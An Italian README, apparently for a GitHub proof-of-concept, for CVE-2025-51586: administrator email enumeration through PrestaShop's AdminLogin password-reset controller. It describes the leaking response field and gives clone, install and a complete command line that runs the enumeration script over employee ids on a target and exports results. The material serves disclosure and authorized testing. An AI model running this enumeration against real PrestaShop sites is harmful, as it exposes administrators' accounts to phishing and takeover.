
PoC di enumerazione email di accesso PrestaShop - CVE-2025-51586. Questo repository fornisce una Proof-of-Concept (PoC) etica per la vulnerabilità PrestaShop che consente l'enumerazione degli utenti tramite il meccanismo di reset della password AdminLogin. Spiega l'impatto, la configurazione e l'uso dello script PoC.
Questa repository contiene un Proof-of-Concept (PoC) etico per la vulnerabilità CVE-2025-51586, che interessa PrestaShop versioni 1.7.x — 8.2.2.
Il PoC enumera gli indirizzi email degli amministratori tramite il meccanismo di reimpostazione della password del Back Office (controller AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee valido e un reset_token non valido<input name="reset_email" value="[email protected]">Avviso ufficiale: Friends of Presta Security
Segnalato da Friends of Presta Security Team (avviso pubblicato il 4 settembre 2025).
Questo PoC è solo a scopo didattico e per test autorizzati. Usalo solo su sistemi di tua proprietà o su cui hai esplicita autorizzazione. L'autore e i collaboratori non sono responsabili di un uso improprio.
Clona e installa le dipendenze:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC sviluppato da 7h30th3r0n3. Vulnerabilità scoperta da Friends of Presta Security Team.